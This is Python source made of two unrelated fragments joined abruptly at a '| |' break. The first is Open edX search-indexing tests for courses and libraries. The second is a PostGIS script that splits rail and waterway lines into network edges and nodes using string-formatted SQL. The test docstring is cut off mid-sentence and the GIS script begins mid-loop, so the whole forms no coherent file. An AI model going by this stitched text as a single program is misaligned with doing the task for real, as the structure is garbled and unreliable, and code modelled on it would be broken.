self._perform_test_using_store(store_type, self._test_search_disabled)
@ddt.data(*WORKS_WITH_STORES)
def test_time_based_index(self, store_type):
self._perform_test_using_store(store_type, self._test_time_based_index)
@ddt.data(*WORKS_WITH_STORES)
def test_exception(self, store_type):
self._perform_test_using_store(store_type, self._test_exception)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_property_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_property_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_store_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_store_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_mode_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_mode_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_location_info(self, store_type):
self._perform_test_using_store(store_type, self._test_course_location_info)
@ddt.data(*WORKS_WITH_STORES)
def test_course_location_null(self, store_type):
self._perform_test_using_store(store_type, self._test_course_location_null)
@ddt.data(*WORKS_WITH_STORES)
def test_delete_course_from_search_index_after_course_deletion(self, store_type):
""" Test for removing course from CourseAboutSearchIndexer """
self._perform_test_using_store(store_type, self._test_delete_course_from_search_index_after_course_deletion)
@patch('django.conf.settings.SEARCH_ENGINE', 'search.tests.utils.ForceRefreshElasticSearchEngine')
@ddt.ddt
class TestLargeCourseDeletions(MixedWithOptionsTestCase):
""" Tests to excerise deleting items from a course """
WORKS_WITH_STORES = (ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def _clean_course_id(self):
"""
Clean all documents from the index that have a specific course provided.
"""
if self.course_id:
response = self.searcher.search(field_dictionary={"course": self.course_id})
while response["total"] > 0:
for item in response["results"]:
self.searcher.remove(item["data"]["id"])
response = self.searcher.search(field_dictionary={"course": self.course_id})
self.course_id = None
def setUp(self):
super().setUp()
self.course_id = None
def tearDown(self):
super().tearDown()
self._clean_course_id()
def assert_search_count(self, expected_count):
""" Check that the search within this course will yield the expected number of results """
response = self.searcher.search(field_dictionary={"course": self.course_id})
self.assertEqual(response["total"], expected_count)
def _do_test_large_course_deletion(self, store, load_factor):
""" Test that deleting items from a course works even when present within a very large course """
def id_list(top_parent_object):
""" private function to get ids from object down the tree """
list_of_ids = [str(top_parent_object.location)]
for child in top_parent_object.get_children():
list_of_ids.extend(id_list(child))
return list_of_ids
course, course_size = create_large_course(store, load_factor)
self.course_id = str(course.id)
# index full course
CoursewareSearchIndexer.do_course_reindex(store, course.id)
self.assert_search_count(course_size)
# reload course to allow us to delete one single unit
course = store.get_course(course.id, depth=1)
# delete the first chapter
chapter_to_delete = course.get_children()[0]
self.delete_item(store, chapter_to_delete.location)
# index and check correctness
CoursewareSearchIndexer.do_course_reindex(store, course.id)
deleted_count = 1 + load_factor + (load_factor ** 2) + (load_factor ** 3)
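# For example, with the load_factor of 6 used below this removes
# 1 + 6 + 36 + 216 = 259 indexed items for the deleted chapter and its descendants.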
self.assert_search_count(course_size - deleted_count)
def _test_large_course_deletion(self, store):
""" exception catch-ing wrapper around large test course test with deletions """
# load_factor of 6 (1296 items) takes about 5 minutes to run on devstack on a laptop
# load_factor of 7 (2401 items) takes about 70 minutes to run on devstack on a laptop
# load_factor of 8 (4096 items) takes just under 3 hours to run on devstack on a laptop
load_factor = 6
try:
self._do_test_large_course_deletion(store, load_factor)
except: # pylint: disable=bare-except
# Catch any exception here to see when we fail
print(f"Failed with load_factor of {load_factor}")
@skip("This test is to see how we handle very large courses, to ensure that the delete"
"procedure works smoothly - too long to run during the normal course of things")
@ddt.data(*WORKS_WITH_STORES)
def test_large_course_deletion(self, store_type):
self._perform_test_using_store(store_type, self._test_large_course_deletion)
class TestTaskExecution(SharedModuleStoreTestCase):
"""
Set of tests to ensure that the task code will do the right thing when
executed directly. The test course and library gets created without the listeners
being present, which allows us to ensure that when the listener is
executed, it is done as expected.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
SignalHandler.course_published.disconnect(listen_for_course_publish)
SignalHandler.library_updated.disconnect(listen_for_library_update)
cls.course = CourseFactory.create(start=datetime(2015, 3, 1, tzinfo=UTC))
cls.chapter = ItemFactory.create(
parent_location=cls.course.location,
category='chapter',
display_name="Week 1",
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
cls.sequential = ItemFactory.create(
parent_location=cls.chapter.location,
category='sequential',
display_name="Lesson 1",
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
cls.vertical = ItemFactory.create(
parent_location=cls.sequential.location,
category='vertical',
display_name='Subsection 1',
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
# unspecified start - should inherit from container
cls.html_unit = ItemFactory.create(
parent_location=cls.vertical.location,
category="html",
display_name="Html Content",
publish_item=False,
)
cls.library = LibraryFactory.create()
cls.library_block1 = ItemFactory.create(
parent_location=cls.library.location,
category="html",
display_name="Html Content",
publish_item=False,
)
cls.library_block2 = ItemFactory.create(
parent_location=cls.library.location,
category="html",
display_name="Html Content 2",
publish_item=False,
)
@classmethod
def tearDownClass(cls):
SignalHandler.course_published.connect(listen_for_course_publish)
SignalHandler.library_updated.connect(listen_for_library_update)
super().tearDownClass()
def test_task_indexing_course(self):
"""
Making sure that the receiver correctly fires off the task when invoked
by signal.
"""
searcher = SearchEngine.get_search_engine(CoursewareSearchIndexer.INDEX_NAME)
response = searcher.search(
field_dictionary={"course": str(self.course.id)}
)
self.assertEqual(response["total"], 0)
listen_for_course_publish(self, self.course.id)
# Note that this test will only succeed if celery is working in inline mode
response = searcher.search(
field_dictionary={"course": str(self.course.id)}
)
self.assertEqual(response["total"], 3)
def test_task_library_update(self):
""" Making sure that the receiver correctly fires off the task when invoked by signal """
searcher = SearchEngine.get_search_engine(LibrarySearchIndexer.INDEX_NAME)
library_search_key = str(normalize_key_for_search(self.library.location.library_key))
response = searcher.search(field_dictionary={"library": library_search_key})
self.assertEqual(response["total"], 0)
listen_for_library_update(self, self.library.location.library_key)
# Note that this test will only succeed if celery is working in inline mode
response = searcher.search(field_dictionary={"library": library_search_key})
self.assertEqual(response["total"], 2)
def test_ignore_ccx(self):
"""Test that we ignore CCX courses (it's too slow now)."""
# We're relying on our CCX short circuit to just stop execution as soon
# as it encounters a CCX key. If that isn't working properly, it will
# fall through to the normal indexing and raise an exception because
# there is no data or backing course behind the course key.
with patch('cms.djangoapps.contentstore.courseware_index.CoursewareSearchIndexer.index') as mock_index:
self.assertIsNone(
update_search_index(
"ccx-v1:OpenEdX+FAKECOURSE+FAKERUN+ccx@1", "2020-09-28T16:41:57.150796"
)
)
self.assertFalse(mock_index.called)
@pytest.mark.django_db
@ddt.ddt
class TestLibrarySearchIndexer(MixedWithOptionsTestCase):
""" Tests the operation of the CoursewareSearchIndexer """
# libraries work only with split, so do library indexer
WORKS_WITH_STORES = (ModuleStoreEnum.Type.split, )
def setUp(self):
super().setUp()
self.library = None
self.html_unit1 = None
self.html_unit2 = None
def setup_course_base(self, store):
"""
Set up the library for the indexing tests.
"""
self.library = LibraryFactory.create(modulestore=store)
self.html_unit1 = ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content",
modulestore=store,
publish_item=False,
)
self.html_unit2 = ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content 2",
modulestore=store,
publish_item=False,
)
INDEX_NAME = LibrarySearchIndexer.INDEX_NAME
def _get_default_search(self):
""" Returns field_dictionary for default search """
return {"library": str(self.library.location.library_key.replace(version_guid=None, branch=None))}
def reindex_library(self, store):
""" kick off complete reindex of the course """
return LibrarySearchIndexer.do_library_reindex(store, self.library.location.library_key)
def _get_contents(self, response):
""" Extracts contents from search response """
return [item['data']['content'] for item in response['results']]
def _test_indexing_library(self, store):
""" indexing course tests """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
added_to_index = self.reindex_library(store)
self.assertEqual(added_to_index, 2)
response = self.search()
self.assertEqual(response["total"], 2)
def _test_creating_item(self, store):
""" test updating an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# adding a new library item causes immediate reindexing
data = "Some data"
ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content 3",
data=data,
modulestore=store,
publish_item=False,
)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 3)
html_contents = [cont['html_content'] for cont in self._get_contents(response)]
self.assertIn(data, html_contents)
def _test_updating_item(self, store):
""" test updating an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# updating a library item causes immediate reindexing
new_data = "I'm new data"
self.html_unit1.data = new_data
self.update_item(store, self.html_unit1)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
html_contents = [cont['html_content'] for cont in self._get_contents(response)]
self.assertIn(new_data, html_contents)
def _test_deleting_item(self, store):
""" test deleting an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# deleting a library item causes immediate reindexing
self.delete_item(store, self.html_unit1.location)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 1)
@patch('django.conf.settings.SEARCH_ENGINE', None)
def _test_search_disabled(self, store):
""" if search setting has it as off, confirm that nothing is indexed """
indexed_count = self.reindex_library(store)
self.assertFalse(indexed_count)
@patch('django.conf.settings.SEARCH_ENGINE', 'search.tests.utils.ErroringIndexEngine')
def _test_exception(self, store):
""" Test that exception within indexing yields a SearchIndexingError """
with self.assertRaises(SearchIndexingError):
self.reindex_library(store)
@ddt.data(*WORKS_WITH_STORES)
def test_indexing_library(self, store_type):
self._perform_test_using_store(store_type, self._test_indexing_library)
@ddt.data(*WORKS_WITH_STORES)
def test_updating_item(self, store_type):
self._perform_test_using_store(store_type, self._test_updating_item)
@ddt.data(*WORKS_WITH_STORES)
def test_creating_item(self, store_type):
self._perform_test_using_store(store_type, self._test_creating_item)
@ddt.data(*WORKS_WITH_STORES)
def test_deleting_item(self, store_type):
self._perform_test_using_store(store_type, self._test_deleting_item)
@ddt.data(*WORKS_WITH_STORES)
def test_search_disabled(self, store_type):
self._perform_test_using_store(store_type, self._test_search_disabled)
@ddt.data(*WORKS_WITH_STORES)
def test_exception(self, store_type):
self._perform_test_using_store(store_type, self._test_exception)
class GroupConfigurationSearchMongo(CourseTestCase, MixedWithOptionsTestCase):
"""
Tests indexing of content groups on course modules using mongo modulestore.
"""
CREATE_USER = True
MODULESTORE = TEST_DATA_MONGO_MODULESTORE
INDEX_NAME = CoursewareSearchIndexer.INDEX_NAME
def setUp(self):
super().setUp()
self._setup_course_with_content()
self._setup_split_test_module()
self._setup_content_groups()
self.reload_course()
def _setup_course_with_content(self):
"""
Set up course with html content in it.
"""
self.chapter = ItemFactory.create(
parent_location=self.course.location,
category='chapter',
display_name="Week 1",
modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.sequential = ItemFactory.create(
parent_location=self.chapter.location,
category='sequential',
display_name="Lesson 1",
modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.sequential2 = ItemFactory.create(
parent_location=self.chapter.location,
category='sequential',
display_name="Lesson 2",
modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.vertical = ItemFactory.create(
parent_location=self.sequential.location,
category='vertical',
display_name='Subsection 1',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
self.vertical2 = ItemFactory.create(
parent_location=self.sequential.location,
category='vertical',
display_name='Subsection 2',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
self.vertical3 = ItemFactory.create(
parent_location=self.sequential2.location,
category='vertical',
display_name='Subsection 3',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
# unspecified start - should inherit from container
self.html_unit1 = ItemFactory.create(
parent_location=self.vertical.location,
category="html",
display_name="Html Content 1",
modulestore=self.store,
publish_item=True,
)
self.html_unit1.parent = self.vertical
self.html_unit2 = ItemFactory.create(
parent_location=self.vertical2.location,
category="html",
display_name="Html Content 2",
modulestore=self.store,
publish_item=True,
)
self.html_unit2.parent = self.vertical2
self.html_unit3 = ItemFactory.create(
parent_location=self.vertical2.location,
category="html",
display_name="Html Content 3",
modulestore=self.store,
publish_item=True,
)
self.html_unit3.parent = self.vertical2
def _setup_split_test_module(self):
"""
Set up split test | |
elr = f.GetField('elr')
pt_tup_list.append((n,frac))
f.Destroy()
f = read_layer.GetNextFeature()
# print pt_id_list
# print pt_frac_list
# print pt_dist_list
'''
ST_Line_Substring
'''
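# Sketch of the PostGIS call used below (assumes PostGIS ST_Line_Substring / ST_LineSubstring):
# ST_Line_Substring(geom, 0.25, 0.75) returns the portion of the linestring between 25% and 75%
# of its length, so sorting the projected point fractions and cutting between consecutive pairs
# splits one edge into consecutive sub-edges.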
if len(pt_tup_list) > 0:
pt_id_sorted = [x for (x,y) in sorted(pt_tup_list, key=lambda pair: pair[1])]
pt_frac_sorted = [y for (x,y) in sorted(pt_tup_list, key=lambda pair: pair[1])]
if min(pt_frac_sorted) > 0:
pt_frac_sorted = [0] + pt_frac_sorted
pt_id_sorted = [st_pt] + pt_id_sorted
if max(pt_frac_sorted) < 1:
pt_frac_sorted = pt_frac_sorted + [1]
pt_id_sorted = pt_id_sorted + [en_pt]
for p in range(len(pt_frac_sorted)-1):
e_id = e_id + 1
pt_st_frac = pt_frac_sorted[p]
pt_en_frac = pt_frac_sorted[p+1]
nf_id = pt_id_sorted[p]
nt_id = pt_id_sorted[p+1]
eid = 'wateredge_' + str(e_id)
sql_insert = '''INSERT INTO public.wateredges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText((SELECT ST_AsText(ST_Line_Substring(geom,{4},{5}))
FROM wateredges WHERE edge_id = '{6}'),4326)
)'''.format(eid,nf_id,nt_id,elr,pt_st_frac,pt_en_frac,lc)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_delete = '''DELETE FROM public.wateredges
WHERE edge_id = '{0}'
'''.format(lc)
delete_layer = conn2.ExecuteSQL(sql_delete)
add_columns_to_table('wateredges', 'waterroutes', ['eid'], ['character varying'],'gid', cur, conn)
add_columns_to_table('waternodes', 'waterports', ['nid'], ['character varying'],'gid', cur, conn)
add_columns_to_table_match_columns('wateredges', 'waterwayedges', ['link','speed'], ['character varying','double precision'],'eid','edge_id', cur, conn)
add_columns_to_table_match_columns('waternodes', 'seaport_nodes', ['ten_cang','tinh'], ['character varying','character varying'],'nid','node_id', cur, conn)
# print (nid_lid_list)
# add_new_id_column('seaport_nodes','seanode_','node_id','gid',cur, conn)
'''
STEP 2:
Transform the multilinestring geometry to a linestring geometry
Create new railway edge table converting the multilinestrings to linestrings
'''
node_id = 'gid'
edge_id = 'gid'
node_layer = 'railway_nodes'
edge_layer = 'railway_edges'
node_attr = 'railwaylin'
edge_attr = 'railwaylin'
sql_query = '''DROP TABLE IF EXISTS
public.railway_edges_linegeom
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railway_edges_linegeom
(
gid integer,
linename character varying(254),
geom geometry(LineString,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
line_id_list = []
new_edge_id = 0
sql_query = '''SELECT {0}, ST_AsText(geom) FROM {1}'''.format(edge_attr,edge_layer)
cur.execute(sql_query)
read_layer = cur.fetchall()
for row in read_layer:
link = row[0]
gt = row[1]
# print (gt)
if gt is not None:
g_x,g_y = get_geom_points(gt)
# line_create = ogr.Geometry(ogr.wkbLineString)
for j in range(0,len(g_x)):
line_create = ogr.Geometry(ogr.wkbLineString)
for i in range(0,len(g_x[j])):
pt_x = g_x[j][i]
pt_y = g_y[j][i]
line_create.AddPoint_2D(pt_x,pt_y)
line_gtext = line_create.ExportToWkt()
new_edge_id += 1
line_id_list.append(new_edge_id)
sql_query = '''INSERT INTO railway_edges_linegeom (gid,linename,geom)
VALUES ({0},'{1}',ST_GeomFromText('{2}',4326))
'''.format(new_edge_id,link,str(line_gtext))
cur.execute(sql_query)
conn.commit()
'''
STEP 3:
Select the nodes and their matching edges
'''
edge_layer = 'railway_edges_linegeom'
edge_attr = 'linename'
nid_lid_list = []
sql_query = '''SELECT A.{0} as nid,
(select B.{1} from {2} as B order by st_distance(A.geom,B.geom) asc limit 1) as lid,
COALESCE((select B.{3} from {4} as B where A.{5} = B.{6} order by st_distance(A.geom,B.geom) asc limit 1),-9999) as sbid_lid,
(select ST_distance(A.geom,B.geom) from {7} as B order by st_distance(A.geom,B.geom) asc limit 1) as cl_dist,
COALESCE((select ST_distance(A.geom,B.geom) from {8} as B where A.{9} = B.{10} order by st_distance(A.geom,B.geom) asc limit 1),-9999) as sbid_dist
from {11} as A
'''.format(node_id,edge_id,edge_layer,edge_id,edge_layer,node_attr,edge_attr,edge_layer,edge_layer,node_attr,edge_attr,node_layer)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
nid = f.GetField('nid')
lid = f.GetField('lid')
sbid_lid = f.GetField('sbid_lid')
cl_dist = f.GetField('cl_dist')
sbid_dist = f.GetField('sbid_dist')
if lid != sbid_lid:
if cl_dist > 100:
match = 0
if sbid_dist > 0:
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
else:
'''
Match the station point to the closest line
'''
nid_lid_list.append((nid,lid,match))
else:
match = 1
if abs(sbid_dist - cl_dist) < 20:
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
else:
'''
Match the station point to the closest line
'''
nid_lid_list.append((nid,lid,match))
else:
match = 1
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
f.Destroy()
f = read_layer.GetNextFeature()
# print (nid_lid_list)
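# Worked example of the matching rules above (hypothetical numbers, units as returned by
# ST_Distance on the stored geometries):
#   closest line lid=12 at cl_dist=40, same-business-code line sbid_lid=15 at sbid_dist=55
#   -> lid != sbid_lid and cl_dist <= 100, and |55 - 40| < 20, so the station is matched
#      to sbid_lid=15 with match=1.
#   If instead cl_dist were 150 (> 100) and sbid_dist > 0, the station would be matched to
#   sbid_lid with match=0.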
'''
STEP 4:
We will create the new edge and node layers
'''
'''
create the edge layer
'''
sql_query = '''DROP TABLE IF EXISTS
public.railnetworkedges
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railnetworkedges
(
edge_id character varying(254),
node_f_id character varying(254),
node_t_id character varying(254),
gid integer,
geom geometry(LineString,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
'''
create the node layer
'''
sql_query = '''DROP TABLE IF EXISTS
public.railnetworknodes
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railnetworknodes
(
node_id character varying(254),
gid integer,
geom geometry(Point,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
'''
STEP 5:
Create the first iteration of the network nodes and edge sets
Based on the station points to rail line matches done in STEP 3
'''
u_lines = list(set(line_id_list))
dummy_pt = 20000
e_id = 0
network_list = []
for item in range(len(u_lines)):
lc = u_lines[item]
nlist = [(n,m) for (n,l,m) in nid_lid_list if l == lc]
if len(nlist) > 0:
'''
Find the nodes which have some edge matches
'''
nl = [n for (n,m) in nlist if m == 1]
if len(nl) > 0:
nl = nl + [0]
pt_tup_list = []
sql_query = '''SELECT A.{0} AS nid,
ST_AsText(ST_ClosestPoint(B.geom,A.geom)) AS pt_geom,
ST_Line_Locate_Point(B.geom,ST_ClosestPoint(B.geom,A.geom)) as frac,
ST_AsText(ST_StartPoint(B.geom)) as st_pt, ST_AsText(ST_EndPoint(B.geom)) as en_pt,
ST_Distance(ST_ClosestPoint(B.geom,A.geom),ST_StartPoint(B.geom)) as st_pt_dist,
ST_Distance(ST_ClosestPoint(B.geom,A.geom),ST_EndPoint(B.geom)) as en_pt_dist
FROM {1} AS A,
{2} AS B
WHERE A.{3} IN {4}
AND B.{5} = {6}
'''.format(node_id,node_layer,edge_layer,node_id,str(tuple(nl)),edge_id,lc)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
nid = f.GetField('nid')
pt_geom = f.GetField('pt_geom')
frac = f.GetField('frac')
st_pt = f.GetField('st_pt')
en_pt = f.GetField('en_pt')
st_pt_dist = f.GetField('st_pt_dist')
en_pt_dist = f.GetField('en_pt_dist')
pt_tup_list.append((nid,pt_geom,st_pt_dist,en_pt_dist,frac))
f.Destroy()
f = read_layer.GetNextFeature()
'''
ST_Line_Substring
'''
if len(pt_tup_list) > 0:
pt_id_sorted = [p for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_geom_sorted = [w for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_dist_st_sorted = [x for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_dist_en_sorted = [y for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_frac_sorted = [z for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
if pt_dist_st_sorted[0] < 1e-10:
pt_frac_sorted[0] = 0
pt_geom_sorted[0] = st_pt
if pt_dist_en_sorted[-1] < 1e-10:
pt_frac_sorted[-1] = 1
pt_geom_sorted[-1] = en_pt
if min(pt_frac_sorted) > 0:
pt_frac_sorted = [0] + pt_frac_sorted
dummy_pt = dummy_pt + 1
# pt_info = (dummy_pt,'No name','No type','No code','No name',elr,'No code')
pt_id_sorted = [dummy_pt] + pt_id_sorted
pt_geom_sorted = [st_pt] + pt_geom_sorted
if max(pt_frac_sorted) < 1:
pt_frac_sorted = pt_frac_sorted + [1]
dummy_pt = dummy_pt + 1
# pt_info = (dummy_pt,'No name','No type','No code','No name',elr,'No code')
pt_id_sorted = pt_id_sorted + [dummy_pt]
pt_geom_sorted = pt_geom_sorted + [en_pt]
for p in range(len(pt_frac_sorted)-1):
e_id = e_id + 1
eid = 'railedge_' + str(e_id)
pt_st_frac = pt_frac_sorted[p]
pt_en_frac = pt_frac_sorted[p+1]
nf_id = pt_id_sorted[p]
nt_id = pt_id_sorted[p+1]
# print (pt_st_frac,pt_en_frac)
nfid = 'railnode_' + str(nf_id)
ntid = 'railnode_' + str(nt_id)
sql_insert = '''INSERT INTO public.railnetworkedges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText((SELECT ST_AsText(ST_Line_Substring(geom,{4},{5}))
FROM {6} WHERE {7} = {8}),4326)
)'''.format(eid,nfid,ntid,lc,pt_st_frac,pt_en_frac,edge_layer,edge_id,lc)
create_layer = conn2.ExecuteSQL(sql_insert)
# sql_insert = '''SELECT ST_AsText(ST_Line_Substring(geom,{0},{1})) as gtext
# FROM {2} WHERE {3} = {4}
# '''.format(pt_st_frac,pt_en_frac,edge_layer,edge_id,lc)
# read_layer = conn2.ExecuteSQL(sql_insert)
# f = read_layer.GetNextFeature()
# while f is not None:
# gt = f.GetField('gtext')
# f.Destroy()
# f = read_layer.GetNextFeature()
# network_list.append((e_id,nf_id,nt_id,lc,gt))
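# Illustrative example of the edge split above (hypothetical values): with sorted fractions
# [0, 0.4, 1.0] and node ids [n1, n2, n3], two rail edges are written:
#   railedge_k   : n1 -> n2, ST_Line_Substring(geom, 0,   0.4)
#   railedge_k+1 : n2 -> n3, ST_Line_Substring(geom, 0.4, 1.0)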
for p in range(len(pt_id_sorted)):
n_id = pt_id_sorted[p]
nid = 'railnode_' + str(n_id)
pt = pt_geom_sorted[p]
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},ST_GeomFromText('{2}',4326))
'''.format(nid,n_id,pt)
create_layer = conn2.ExecuteSQL(sql_insert)
# # sql_insert = '''INSERT INTO public.railnetworknodes
# # (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# # VALUES (%s,'%s','%s','%s','%s','%s','%s',
# # ST_GeomFromText('%s',27700))
# # '''%(n_id,n_a,t_y,f_c,f_n,e_l,s_t,pt)
# # create_layer = conn2.ExecuteSQL(sql_insert)
# else:
# sql_insert = '''INSERT INTO public.railnetworknodes
# (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# VALUES (%s,'No name','No type','No code','No name','%s','No code',
# ST_GeomFromText('%s',27700))
# '''%(n_id,elr,pt)
# create_layer = conn2.ExecuteSQL(sql_insert)
'''
Find the nodes which have no edge matches
'''
# nl = [n for (n,m) in nlist if m == 0]
# if len(nl) > 0:
# for n in nl:
# sql_insert = '''INSERT INTO public.railnetworknodes
# (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# VALUES (%s,
# (SELECT name
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT type
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT fo_code
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT fo_name
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT primary_el
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT stn_code
# FROM public.stationspoint WHERE ogc_fid = %s),
# ST_GeomFromText((SELECT ST_AsText(geom)
# FROM public.stationspoint WHERE ogc_fid = %s),27700))
# '''%(n,n,n,n,n,n,n,n)
# create_layer = conn2.ExecuteSQL(sql_insert)
else:
sql_query = '''SELECT ST_AsText(geom) AS l_geom,
ST_AsText(ST_StartPoint(geom)) as st_pt,
ST_AsText(ST_EndPoint(geom)) as en_pt
FROM {0}
WHERE gid = {1}
'''.format(edge_layer,lc)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
gt = f.GetField('l_geom')
st_pt = f.GetField('st_pt')
en_pt = f.GetField('en_pt')
dummy_pt = dummy_pt + 1
nf_id = dummy_pt
dummy_pt = dummy_pt + 1
nt_id = dummy_pt
# edge_id = edge_id + 1
e_id += 1
# network_list.append((e_id,nf_id,nt_id,lc,gt))
eid = 'railedge_' + str(e_id)
nfid = 'railnode_' + str(nf_id)
ntid = 'railnode_' + str(nt_id)
sql_insert = '''INSERT INTO public.railnetworkedges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText('{4}',4326))
'''.format(eid,nfid,ntid,lc,gt)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},
ST_GeomFromText('{2}',4326))
'''.format(nfid,nf_id,st_pt)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},
ST_GeomFromText('{2}',4326))
'''.format(ntid,nt_id,en_pt)
create_layer = conn2.ExecuteSQL(sql_insert)
f.Destroy()
f = read_layer.GetNextFeature()
print ('done with line number %s with code %s'%(item,lc))
# df = pd.DataFrame(network_list,columns = ['edge_id','node_f_id','node_t_id','line_code','geom'])
# df.to_csv('rail_network.csv',index = False)
'''
STEP 6:
Remove the common nodes from the node and edge sets
If two nodes are at the same location (zero geographic distance), they are considered the same node
'''
node_s_pairs = []
sql_query = '''SELECT A.node_id as a_n, B.node_id as b_n
from railnetworknodes as A, railnetworknodes as B
where ST_Distance(A.geom::geography,B.geom::geography) = 0
and A.node_id != B.node_id
'''
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
a_n = f.GetField('a_n')
b_n = f.GetField('b_n')
if ([a_n,b_n] not in node_s_pairs) and ([b_n,a_n] not in node_s_pairs):
node_s_pairs.append([a_n,b_n])
f.Destroy()
f = read_layer.GetNextFeature()
# print len(node_s_pairs)
# print node_s_pairs[0:10]
'''
Get all the groups of common nodes
'''
'''
Sample list
l = [['a', 'b', 'c'], ['b', 'd', 'e'], ['k'], ['o', 'p'], ['e', 'f'], ['p', 'a'], ['d', 'g']]
'''
l = copy.deepcopy(node_s_pairs)
out = []
while len(l)>0:
first, rest = l[0], l[1:]
first = set(first)
lf = -1
while len(first)>lf:
lf = len(first)
rest2 = []
for r in rest:
if len(first.intersection(set(r)))>0:
first |= set(r)
else:
rest2.append(r)
rest = rest2
out.append(first)
l = rest
# print(len(out))
# print out[0:10]
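# For the sample list above, the merge loop produces two groups:
#   out == [{'a','b','c','d','e','f','g','o','p'}, {'k'}]
# i.e. it computes connected components over the node-pair list, so every cluster of
# coincident nodes collapses onto a single representative node below.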
'''
Test it!
'''
for i in out:
nodes = sorted(list(i))
del_nodes = nodes[1:] + ['0']
sql_update = '''UPDATE railnetworkedges SET node_f_id = '{0}'
WHERE node_f_id IN {1}
'''.format(nodes[0],str(tuple(nodes)))
update_layer = conn2.ExecuteSQL(sql_update)
sql_update = '''UPDATE railnetworkedges SET node_t_id = '{0}'
WHERE node_t_id IN {1}
'''.format(nodes[0],str(tuple(nodes)))
update_layer = conn2.ExecuteSQL(sql_update)
sql_delete = '''DELETE FROM railnetworknodes
WHERE node_id IN {0}
'''.format(str(tuple(del_nodes)))
delete_layer = conn2.ExecuteSQL(sql_delete)
'''
STEP 7:
Get all the nodes with degree 1 and find if they are close to other edges
'''
cl_edges = []
nodes_edges = []
sql_query = '''SELECT A.node_id as a_n,
(SELECT B.edge_id from railnetworkedges as B where B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_f_id = A.node_id)
and B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_t_id = A.node_id) order by st_distance(A.geom,B.geom) asc limit 1) as b_n,
(SELECT ST_Distance(A.geom,B.geom)from railnetworkedges as B where B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_f_id = A.node_id)
